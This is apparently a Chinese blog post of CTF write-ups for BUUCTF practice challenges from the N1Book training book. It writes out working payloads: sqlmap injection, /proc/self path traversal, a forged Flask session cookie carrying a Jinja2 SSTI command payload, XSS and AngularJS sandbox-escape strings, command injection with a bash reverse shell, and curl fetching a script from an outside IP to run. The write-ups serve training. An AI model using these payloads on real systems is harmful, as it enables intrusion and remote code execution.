《从0到1:CTFer成长之路》书籍配套题目 Buuctf N1Book

好久没做buu的题了。   =.=

 

 

[第一章 web入门]SQL注入-2

访问login.php源码说?tips=1有东西,我们就随便输入用户名和密码抓包,得到参数名称,name和pass,然后我比较懒直接sqlmap,网上也有师傅手工写的挺好的:一道题讲懂SQL盲注   题目详解

python sqlmap.py -u "http://d9928328-e53e-484b-82c4-ebb5dd9c9836.node3.buuoj.cn/login.php?tips=1" --data="name=1'&pass=password&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql --dbs

 

 虽然说懒吧,但是他跑了二十多分钟是我没想到的。

 

 

 

 

 

 

[第一章 web入门]afr_3

/proc/[pid],当查看当前进程的时候可以用/proc/self代替
cmdline — 启动当前进程的完整命令,但僵尸进程目录中的此文件不包含任何信息
cwd — 指向当前进程运行目录的一个符号链接
environ — 当前进程的环境变量列表,彼此间用空字符(NULL)隔开;变量用大写字母表示,其值用小写字母表示

 

请求?name=../../../../../proc/self/cmdline获取当前执行系统命令,得到

python server.py

?name=../../../../../proc/self/cwd/server.py获取源码

 

看到有个flag.py和key.py
在flag.py中应该是存在flag,但是不能查看

@app.route("/n1page", methods=["GET", "POST"])
def n1page():
    if request.method != "POST":
        return redirect(url_for("index"))
    n1code = request.form.get("n1code") or None
    if n1code is not None:
        n1code = n1code.replace(".", "").replace("_", "").replace("{","").replace("}","")
    if "n1code" not in session or session['n1code'] is None:
        session['n1code'] = n1code
    template = None
    if session['n1code'] is not None:
     '''
     这里存在SSTI
     '''
        template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' % session['n1code']
        session['n1code'] = None
    return render_template_string(template)

所以请求 name=../../../../../proc/self/cwd/key.py获取appkey

伪造cookie为SSTI的payload获取flag.

flask_session_cookie_manager3.py encode -s "Drmhze6EPcv0fN_81Bj-nA" -t "{'n1code': '{{\'\'.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\'os\'].popen(\'cat flag.py\').read()}}'}"

 

 

.eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.YF1mtQ.r6f0HB-dwcCcrhuZrMaOxG2-n-A

 

[第二章 web进阶]XSS闯关

 

 level 1

 

 level 2

 

 username被escape编码了,构造

?username=';alert(1);//

 

 

这样username:
var username = ‘’;alert(1);//’;
成功执行了alert(1)。

 level 3

 

 他把我单引号过滤了,那我写俩

?username='';alert(1);//

 

 level 4

 

 伪链接
javascript:alert(1),浏览器会把javascript后面的那一段内容当做代码,直接在当前页面执行。
代码中接收jumpUrl作为跳转url

/level4?jumpUrl=javascript:alert(1)

 

 

level 5

 

 

 

 限制1

    if(getQueryVariable('autosubmit') !== false){

autosubmit=1

限制2

autoForm.action = (getQueryVariable('action') == false) ? location.href : getQueryVariable('action');

同样是传值,只不过是传我们的注入语句
完整payload

/level5?autosubmit=1&action=javascript:alert(1)

 

 level 6

 

 看一下这个环境用的是哪个模板,发现是AngularJS

 参考:

AngularJS客户端模板注入(XSS) 

 我们的Angular版本是1.4.6,存在沙箱,因此要去搜索这个版本的Angular的沙箱逃逸的方法: 

AngularJS Sandbox Bypasses 

 直接拷过来用

{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

 

 flag出。

 

[第二章 web进阶]死亡ping命令

准备

首先开小buu号打开这个靶机

 

 ssh连一下

 

 

 

 额,这本身也是一个题。。。

看看它的ip

 

 答题

这里建议直接到burp里操作,因为在网页的话输入的东西会被编码。

发现它过滤了很多非法字符

用%0a代替;

 

可以。

由于docker是没有bash、python程序的,并且sh反弹是不行的。

bash -i >& /dev/tcp/127.0.0.1/8080 0>&1

目前是能通过折中的方式执行任意命令

 编写1.sh

 

 请求bash到tmp目录

127.0.0.1%0acurl your_buu_ip/1.sh > /tmp/1.sh   #请求bash文件到tmp目录
127.0.0.1%0acurl 117.21.200.166/1.sh > /tmp/1.sh 

 

 给bash加权限

127.0.0.1%0achmod 777 /tmp/1.sh

在117.21.200.166的机器上进行监听8089端口

 

 执行1.sh

 

 终端回显,flag出

 

[第二章 web进阶]文件上传

这个题吧,有点坑

<?php
header("Content-Type:text/html; charset=utf-8");
// 每5分钟会清除一次目录下上传的文件
require_once('pclzip.lib.php');

if(!$_FILES){

        echo '

<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta http-equiv="X-UA-Compatible" content="ie=edge" />
    <title>文件上传章节练习题</title>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@3.3.7/dist/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
    <style type="text/css">
        .login-box{
            margin-top: 100px;
            height: 500px;
            border: 1px solid #000;
        }
        body{
            background: white;
        }
        .btn1{
            width: 200px;
        }
        .d1{
            display: block;
            height: 400px;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="login-box col-md-12">
        <form class="form-horizontal" method="post" enctype="multipart/form-data" >
            <h1>文件上传章节练习题</h1>
            <hr />
            <div class="form-group">
                <label class="col-sm-2 control-label">选择文件:</label>
                <div class="input-group col-sm-10">
                    <div >
                    <label for="">
                        <input type="file" name="file" />
                    </label>
                    </div>
                </div>
            </div>
                
        <div class="col-sm-8  text-right">
            <input type="submit" class="btn btn-success text-right btn1" />
        </div>
        </form>
        </div>
    </div>
</body>
</html>
';

    show_source(__FILE__);
}else{
    $file = $_FILES['file'];

    if(!$file){
        exit("请勿上传空文件");
    }
    $name = $file['name'];

    $dir = 'upload/';
    $ext = strtolower(substr(strrchr($name, '.'), 1));
    $path = $dir.$name;

    function check_dir($dir){
        $handle = opendir($dir);
        while(($f = readdir($handle)) !== false){
            if(!in_array($f, array('.', '..'))){
                if(is_dir($dir.$f)){
                    check_dir($dir.$f.'/');
                 }else{
                    $ext = strtolower(substr(strrchr($f, '.'), 1));
                    if(!in_array($ext, array('jpg', 'gif', 'png'))){
                        unlink($dir.$f);
                    }
                }
            
            }
        }
    }

    if(!is_dir($dir)){
        mkdir($dir);
    }

    $temp_dir = $dir.md5(time(). rand(1000,9999));
    if(!is_dir($temp_dir)){
        mkdir($temp_dir);
    }

    if(in_array($ext, array('zip', 'jpg', 'gif', 'png'))){
        if($ext == 'zip'){
            $archive = new PclZip($file['tmp_name']);
            foreach($archive->listContent() as $value){
                $filename = $value["filename"];
                if(preg_match('/\.php$/', $filename)){
                     exit("压缩包内不允许含有php文件!");
                 }
            }
            if ($archive->extract(PCLZIP_OPT_PATH, $temp_dir, PCLZIP_OPT_REPLACE_NEWER) == 0) {
                check_dir($dir);
                   exit("解压失败");
            }

            check_dir($dir);
            exit('上传成功!');
        }else{
            move_uploaded_file($file['tmp_name'], $temp_dir.'/'.$file['name']);
            check_dir($dir);
            exit('上传成功!');
        }
    }else{
        exit('仅允许上传zip、jpg、gif、png文件!');
    }
}

通过解读zip文件代码可知,通过zip上传后,服务器会对zip进行解压,放在upload目录下,然后如果这个目录下含有非白名单的文件,就会对该文件进行删除,所以一个办法就是把文件解压到upload目录之外

我们发现使用了Apache,因此想到apache的解析漏洞。即构造xxxx.php.xxx,只要最后的xxx不能被解析,会继续向左解析,因此php可以成功被解析。

先window下创一个压缩包,把一句话写到一个长度为你要改的长度的文件中,拖到zip压缩包里,最好你原本文件名字的长度和你要改的长度一样,不然你就哭吧

用的是010,

 

 保存,上传,访问,成功

 

[第三章 web进阶]SSTI

打开之后,发现就告诉我password is wrong,再看题目,模板注入,试试password,

 

 就是flask模板注入。

通过以下语句拿到可用的类的列表

?password={{"".__class__.__bases__[0].__subclasses__()}}

 

 写个脚本

s= ["<class 'type'>", "<class 'weakref'>", "<class 'weakcallableproxy'>", "<class 'weakproxy'>", "<class 'int'>", "<class 'bytearray'>", "<class 'bytes'>", "<class 'list'>", "<class 'NoneType'>", "<class 'NotImplementedType'>", "<class 'traceback'>", "<class 'super'>", "<class 'range'>", "<class 'dict'>", "<class 'dict_keys'>", "<class 'dict_values'>", "<class 'dict_items'>", "<class 'odict_iterator'>", "<class 'set'>", "<class 'str'>", "<class 'slice'>", "<class 'staticmethod'>", "<class 'complex'>", "<class 'float'>", "<class 'frozenset'>", "<class 'property'>", "<class 'managedbuffer'>", "<class 'memoryview'>", "<class 'tuple'>", "<class 'enumerate'>", "<class 'reversed'>", "<class 'stderrprinter'>", "<class 'code'>", "<class 'frame'>", "<class 'builtin_function_or_method'>", "<class 'method'>", "<class 'function'>", "<class 'mappingproxy'>", "<class 'generator'>", "<class 'getset_descriptor'>", "<class 'wrapper_descriptor'>", "<class 'method-wrapper'>", "<class 'ellipsis'>", "<class 'member_descriptor'>", "<class 'types.SimpleNamespace'>", "<class 'PyCapsule'>", "<class 'longrange_iterator'>", "<class 'cell'>", "<class 'instancemethod'>", "<class 'classmethod_descriptor'>", "<class 'method_descriptor'>", "<class 'callable_iterator'>", "<class 'iterator'>", "<class 'coroutine'>", "<class 'coroutine_wrapper'>", "<class 'moduledef'>", "<class 'module'>", "<class 'EncodingMap'>", "<class 'fieldnameiterator'>", "<class 'formatteriterator'>", "<class 'filter'>", "<class 'map'>", "<class 'zip'>", "<class 'BaseException'>", "<class 'hamt'>", "<class 'hamt_array_node'>", "<class 'hamt_bitmap_node'>", "<class 'hamt_collision_node'>", "<class 'keys'>", "<class 'values'>", "<class 'items'>", "<class 'Context'>", "<class 'ContextVar'>", "<class 'Token'>", "<class 'Token.MISSING'>", "<class '_frozen_importlib._ModuleLock'>", "<class '_frozen_importlib._DummyModuleLock'>", "<class '_frozen_importlib._ModuleLockManager'>", "<class '_frozen_importlib._installed_safely'>", "<class '_frozen_importlib.ModuleSpec'>", "<class '_frozen_importlib.BuiltinImporter'>", "<class 'classmethod'>", "<class '_frozen_importlib.FrozenImporter'>", "<class '_frozen_importlib._ImportLockContext'>", "<class '_thread._localdummy'>", "<class '_thread._local'>", "<class '_thread.lock'>", "<class '_thread.RLock'>", "<class 'zipimport.zipimporter'>", "<class '_frozen_importlib_external.WindowsRegistryFinder'>", "<class '_frozen_importlib_external._LoaderBasics'>", "<class '_frozen_importlib_external.FileLoader'>", "<class '_frozen_importlib_external._NamespacePath'>", "<class '_frozen_importlib_external._NamespaceLoader'>", "<class '_frozen_importlib_external.PathFinder'>", "<class '_frozen_importlib_external.FileFinder'>", "<class '_io._IOBase'>", "<class '_io._BytesIOBuffer'>", "<class '_io.IncrementalNewlineDecoder'>", "<class 'posix.ScandirIterator'>", "<class 'posix.DirEntry'>", "<class 'codecs.Codec'>", "<class 'codecs.IncrementalEncoder'>", "<class 'codecs.IncrementalDecoder'>", "<class 'codecs.StreamReaderWriter'>", "<class 'codecs.StreamRecoder'>", "<class '_abc_data'>", "<class 'abc.ABC'>", "<class 'dict_itemiterator'>", "<class 'collections.abc.Hashable'>", "<class 'collections.abc.Awaitable'>", "<class 'collections.abc.AsyncIterable'>", "<class 'async_generator'>", "<class 'collections.abc.Iterable'>", "<class 'bytes_iterator'>", "<class 'bytearray_iterator'>", "<class 'dict_keyiterator'>", "<class 'dict_valueiterator'>", "<class 'list_iterator'>", "<class 'list_reverseiterator'>", "<class 'range_iterator'>", "<class 'set_iterator'>", "<class 'str_iterator'>", "<class 'tuple_iterator'>", "<class 'collections.abc.Sized'>", "<class 'collections.abc.Container'>", "<class 'collections.abc.Callable'>", "<class 'os._wrap_close'>", "<class '_sitebuiltins.Quitter'>", "<class '_sitebuiltins._Printer'>", "<class '_sitebuiltins._Helper'>", "<class 'types.DynamicClassAttribute'>", "<class 'types._GeneratorWrapper'>", "<class 'collections.deque'>", "<class '_collections._deque_iterator'>", "<class '_collections._deque_reverse_iterator'>", "<class 'enum.auto'>", "<enum 'Enum'>", "<class 're.Pattern'>", "<class 're.Match'>", "<class '_sre.SRE_Scanner'>", "<class 'sre_parse.Pattern'>", "<class 'sre_parse.SubPattern'>", "<class 'sre_parse.Tokenizer'>", "<class 'functools.partial'>", "<class 'functools._lru_cache_wrapper'>", "<class 'operator.itemgetter'>", "<class 'operator.attrgetter'>", "<class 'operator.methodcaller'>", "<class 'itertools.accumulate'>", "<class 'itertools.combinations'>", "<class 'itertools.combinations_with_replacement'>", "<class 'itertools.cycle'>", "<class 'itertools.dropwhile'>", "<class 'itertools.takewhile'>", "<class 'itertools.islice'>", "<class 'itertools.starmap'>", "<class 'itertools.chain'>", "<class 'itertools.compress'>", "<class 'itertools.filterfalse'>", "<class 'itertools.count'>", "<class 'itertools.zip_longest'>", "<class 'itertools.permutations'>", "<class 'itertools.product'>", "<class 'itertools.repeat'>", "<class 'itertools.groupby'>", "<class 'itertools._grouper'>", "<class 'itertools._tee'>", "<class 'itertools._tee_dataobject'>", "<class 'reprlib.Repr'>", "<class 'collections._Link'>", "<class 'functools.partialmethod'>", "<class 're.Scanner'>", "<class 'string.Template'>", "<class 'string.Formatter'>", "<class 'markupsafe._MarkupEscapeHelper'>", "<class 'warnings.WarningMessage'>", "<class 'warnings.catch_warnings'>", "<class 'zlib.Compress'>", "<class 'zlib.Decompress'>", "<class 'tokenize.Untokenizer'>", "<class 'traceback.FrameSummary'>", "<class 'traceback.TracebackException'>", "<class '_weakrefset._IterationGuard'>", "<class '_weakrefset.WeakSet'>", "<class 'threading._RLock'>", "<class 'threading.Condition'>", "<class 'threading.Semaphore'>", "<class 'threading.Event'>", "<class 'threading.Barrier'>", "<class 'threading.Thread'>", "<class '_bz2.BZ2Compressor'>", "<class '_bz2.BZ2Decompressor'>", "<class '_lzma.LZMACompressor'>", "<class '_lzma.LZMADecompressor'>", "<class '_hashlib.HASH'>", "<class '_blake2.blake2b'>", "<class '_blake2.blake2s'>", "<class '_sha3.sha3_224'>", "<class '_sha3.sha3_256'>", "<class '_sha3.sha3_384'>", "<class '_sha3.sha3_512'>", "<class '_sha3.shake_128'>", "<class '_sha3.shake_256'>", "<class '_random.Random'>", "<class 'weakref.finalize._Info'>", "<class 'weakref.finalize'>", "<class 'tempfile._RandomNameSequence'>", "<class 'tempfile._TemporaryFileCloser'>", "<class 'tempfile._TemporaryFileWrapper'>", "<class 'tempfile.SpooledTemporaryFile'>", "<class 'tempfile.TemporaryDirectory'>", "<class 'Struct'>", "<class 'unpack_iterator'>", "<class 'pickle._Framer'>", "<class 'pickle._Unframer'>", "<class 'pickle._Pickler'>", "<class 'pickle._Unpickler'>", "<class '_pickle.Unpickler'>", "<class '_pickle.Pickler'>", "<class '_pickle.Pdata'>", "<class '_pickle.PicklerMemoProxy'>", "<class '_pickle.UnpicklerMemoProxy'>", "<class 'urllib.parse._ResultMixinStr'>", "<class 'urllib.parse._ResultMixinBytes'>", "<class 'urllib.parse._NetlocResultMixinBase'>", "<class '_json.Scanner'>", "<class '_json.Encoder'>", "<class 'json.decoder.JSONDecoder'>", "<class 'json.encoder.JSONEncoder'>", "<class 'jinja2.utils.MissingType'>", "<class 'jinja2.utils.LRUCache'>", "<class 'jinja2.utils.Cycler'>", "<class 'jinja2.utils.Joiner'>", "<class 'jinja2.utils.Namespace'>", "<class 'jinja2.bccache.Bucket'>", "<class 'jinja2.bccache.BytecodeCache'>", "<class 'jinja2.nodes.EvalContext'>", "<class 'jinja2.nodes.Node'>", "<class 'jinja2.visitor.NodeVisitor'>", "<class 'jinja2.idtracking.Symbols'>", "<class '__future__._Feature'>", "<class 'jinja2.compiler.MacroRef'>", "<class 'jinja2.compiler.Frame'>", "<class 'jinja2.runtime.TemplateReference'>", "<class 'jinja2.runtime.Context'>", "<class 'jinja2.runtime.BlockReference'>", "<class 'jinja2.runtime.LoopContext'>", "<class 'jinja2.runtime.Macro'>", "<class 'jinja2.runtime.Undefined'>", "<class 'decimal.Decimal'>", "<class 'decimal.Context'>", "<class 'decimal.SignalDictMixin'>", "<class 'decimal.ContextManager'>", "<class 'numbers.Number'>", "<class '_ast.AST'>", "<class 'ast.NodeVisitor'>", "<class 'jinja2.lexer.Failure'>", "<class 'jinja2.lexer.TokenStreamIterator'>", "<class 'jinja2.lexer.TokenStream'>", "<class 'jinja2.lexer.Lexer'>", "<class 'jinja2.parser.Parser'>", "<class 'jinja2.environment.Environment'>", "<class 'jinja2.environment.Template'>", "<class 'jinja2.environment.TemplateModule'>", "<class 'jinja2.environment.TemplateExpression'>", "<class 'jinja2.environment.TemplateStream'>", "<class 'jinja2.loaders.BaseLoader'>", "<class 'select.poll'>", "<class 'select.epoll'>", "<class 'selectors.BaseSelector'>", "<class '_socket.socket'>", "<class 'datetime.date'>", "<class 'datetime.timedelta'>", "<class 'datetime.time'>", "<class 'datetime.tzinfo'>", "<class 'dis.Bytecode'>", "<class 'inspect.BlockFinder'>", "<class 'inspect._void'>", "<class 'inspect._empty'>", "<class 'inspect.Parameter'>", "<class 'inspect.BoundArguments'>", "<class 'inspect.Signature'>", "<class 'logging.LogRecord'>", "<class 'logging.PercentStyle'>", "<class 'logging.Formatter'>", "<class 'logging.BufferingFormatter'>", "<class 'logging.Filter'>", "<class 'logging.Filterer'>", "<class 'logging.PlaceHolder'>", "<class 'logging.Manager'>", "<class 'logging.LoggerAdapter'>", "<class 'werkzeug._internal._Missing'>", "<class 'werkzeug._internal._DictAccessorProperty'>", "<class 'importlib.abc.Finder'>", "<class 'importlib.abc.Loader'>", "<class 'importlib.abc.ResourceReader'>", "<class 'contextlib.ContextDecorator'>", "<class 'contextlib._GeneratorContextManagerBase'>", "<class 'contextlib._BaseExitStack'>", "<class 'pkgutil.ImpImporter'>", "<class 'pkgutil.ImpLoader'>", "<class 'werkzeug.utils.HTMLBuilder'>", "<class 'werkzeug.exceptions.Aborter'>", "<class 'werkzeug.urls.Href'>", "<class 'socketserver.BaseServer'>", "<class 'socketserver.ForkingMixIn'>", "<class 'socketserver.ThreadingMixIn'>", "<class 'socketserver.BaseRequestHandler'>", "<class 'calendar._localized_month'>", "<class 'calendar._localized_day'>", "<class 'calendar.Calendar'>", "<class 'calendar.different_locale'>", "<class 'email._parseaddr.AddrlistClass'>", "<class 'email.charset.Charset'>", "<class 'email.header.Header'>", "<class 'email.header._ValueFormatter'>", "<class 'email._policybase._PolicyBase'>", "<class 'email.feedparser.BufferedSubFile'>", "<class 'email.feedparser.FeedParser'>", "<class 'email.parser.Parser'>", "<class 'email.parser.BytesParser'>", "<class 'email.message.Message'>", "<class 'http.client.HTTPConnection'>", "<class '_ssl._SSLContext'>", "<class '_ssl._SSLSocket'>", "<class '_ssl.MemoryBIO'>", "<class '_ssl.Session'>", "<class 'ssl.SSLObject'>", "<class 'mimetypes.MimeTypes'>", "<class 'click._compat._FixupStream'>", "<class 'click._compat._AtomicFile'>", "<class 'click.utils.LazyFile'>", "<class 'click.utils.KeepOpenFile'>", "<class 'click.utils.PacifyFlushWrapper'>", "<class 'click.parser.Option'>", "<class 'click.parser.Argument'>", "<class 'click.parser.ParsingState'>", "<class 'click.parser.OptionParser'>", "<class 'click.types.ParamType'>", "<class 'click.formatting.HelpFormatter'>", "<class 'click.core.Context'>", "<class 'click.core.BaseCommand'>", "<class 'click.core.Parameter'>", "<class 'werkzeug.serving.WSGIRequestHandler'>", "<class 'werkzeug.serving._SSLContext'>", "<class 'werkzeug.serving.BaseWSGIServer'>", "<class 'werkzeug.datastructures.ImmutableListMixin'>", "<class 'werkzeug.datastructures.ImmutableDictMixin'>", "<class 'werkzeug.datastructures.UpdateDictMixin'>", "<class 'werkzeug.datastructures.ViewItems'>", "<class 'werkzeug.datastructures._omd_bucket'>", "<class 'werkzeug.datastructures.Headers'>", "<class 'werkzeug.datastructures.ImmutableHeadersMixin'>", "<class 'werkzeug.datastructures.IfRange'>", "<class 'werkzeug.datastructures.Range'>", "<class 'werkzeug.datastructures.ContentRange'>", "<class 'werkzeug.datastructures.FileStorage'>", "<class 'urllib.request.Request'>", "<class 'urllib.request.OpenerDirector'>", "<class 'urllib.request.BaseHandler'>", "<class 'urllib.request.HTTPPasswordMgr'>", "<class 'urllib.request.AbstractBasicAuthHandler'>", "<class 'urllib.request.AbstractDigestAuthHandler'>", "<class 'urllib.request.URLopener'>", "<class 'urllib.request.ftpwrapper'>", "<class 'werkzeug.wrappers.accept.AcceptMixin'>", "<class 'werkzeug.wrappers.auth.AuthorizationMixin'>", "<class 'werkzeug.wrappers.auth.WWWAuthenticateMixin'>", "<class 'werkzeug.wsgi.ClosingIterator'>", "<class 'werkzeug.wsgi.FileWrapper'>", "<class 'werkzeug.wsgi._RangeWrapper'>", "<class 'werkzeug.formparser.FormDataParser'>", "<class 'werkzeug.formparser.MultiPartParser'>", "<class 'werkzeug.wrappers.base_request.BaseRequest'>", "<class 'werkzeug.wrappers.base_response.BaseResponse'>", "<class 'werkzeug.wrappers.common_descriptors.CommonRequestDescriptorsMixin'>", "<class 'werkzeug.wrappers.common_descriptors.CommonResponseDescriptorsMixin'>", "<class 'werkzeug.wrappers.etag.ETagRequestMixin'>", "<class 'werkzeug.wrappers.etag.ETagResponseMixin'>", "<class 'werkzeug.wrappers.cors.CORSRequestMixin'>", "<class 'werkzeug.wrappers.cors.CORSResponseMixin'>", "<class 'werkzeug.useragents.UserAgentParser'>", "<class 'werkzeug.useragents.UserAgent'>", "<class 'werkzeug.wrappers.user_agent.UserAgentMixin'>", "<class 'werkzeug.wrappers.request.StreamOnlyMixin'>", "<class 'werkzeug.wrappers.response.ResponseStream'>", "<class 'werkzeug.wrappers.response.ResponseStreamMixin'>", "<class 'http.cookiejar.Cookie'>", "<class 'http.cookiejar.CookiePolicy'>", "<class 'http.cookiejar.Absent'>", "<class 'http.cookiejar.CookieJar'>", "<class 'werkzeug.test._TestCookieHeaders'>", "<class 'werkzeug.test._TestCookieResponse'>", "<class 'werkzeug.test.EnvironBuilder'>", "<class 'werkzeug.test.Client'>", "<class 'uuid.UUID'>", "<class 'itsdangerous._json._CompactJSON'>", "<class 'hmac.HMAC'>", "<class 'itsdangerous.signer.SigningAlgorithm'>", "<class 'itsdangerous.signer.Signer'>", "<class 'itsdangerous.serializer.Serializer'>", "<class 'itsdangerous.url_safe.URLSafeSerializerMixin'>", "<class 'flask._compat._DeprecatedBool'>", "<class 'werkzeug.local.Local'>", "<class 'werkzeug.local.LocalStack'>", "<class 'werkzeug.local.LocalManager'>", "<class 'werkzeug.local.LocalProxy'>", "<class 'dataclasses._HAS_DEFAULT_FACTORY_CLASS'>", "<class 'dataclasses._MISSING_TYPE'>", "<class 'dataclasses._FIELD_BASE'>", "<class 'dataclasses.InitVar'>", "<class 'dataclasses.Field'>", "<class 'dataclasses._DataclassParams'>", "<class 'difflib.SequenceMatcher'>", "<class 'difflib.Differ'>", "<class 'difflib.HtmlDiff'>", "<class 'pprint._safe_key'>", "<class 'pprint.PrettyPrinter'>", "<class 'werkzeug.routing.RuleFactory'>", "<class 'werkzeug.routing.RuleTemplate'>", "<class 'werkzeug.routing.BaseConverter'>", "<class 'werkzeug.routing.Map'>", "<class 'werkzeug.routing.MapAdapter'>", "<class 'subprocess.CompletedProcess'>", "<class 'subprocess.Popen'>", "<class 'flask.signals.Namespace'>", "<class 'flask.signals._FakeSignal'>", "<class 'flask.helpers.locked_cached_property'>", "<class 'flask.helpers._PackageBoundObject'>", "<class 'flask.cli.DispatchingApp'>", "<class 'flask.cli.ScriptInfo'>", "<class 'flask.config.ConfigAttribute'>", "<class 'flask.ctx._AppCtxGlobals'>", "<class 'flask.ctx.AppContext'>", "<class 'flask.ctx.RequestContext'>", "<class 'flask.json.tag.JSONTag'>", "<class 'flask.json.tag.TaggedJSONSerializer'>", "<class 'flask.sessions.SessionInterface'>", "<class 'werkzeug.wrappers.json._JSONModule'>", "<class 'werkzeug.wrappers.json.JSONMixin'>", "<class 'flask.blueprints.BlueprintSetupState'>", "<class 'jinja2.ext.Extension'>", "<class 'jinja2.ext._CommentFinder'>", "<class 'unicodedata.UCD'>"]
a="os"
count=0
for i in s:
    if a in i:
        print("{}{}".format(i,count))
    count+=1

 

 

?password={{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('ls').read()}}

 

 经过手工遍历,找到flag

 

 

../?password={{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('cat /app/server.py').read()}}

ssti:https://www.cnblogs.com/20175211lyz/p/11425368.html

 

[第三章 web进阶]Python里的SSRF

 

 emmm,

 

 应该是127.0.0.1被禁止了,localhost也被禁止了

 

 

[第三章 web进阶]thinkphp反序列化利用链

参考:Thinkphp 反序列化利用链深入分析

初识反序列化

 

posted @ 2021-03-15 22:49  夜布多  阅读(2901)  评论(0编辑  收藏  举报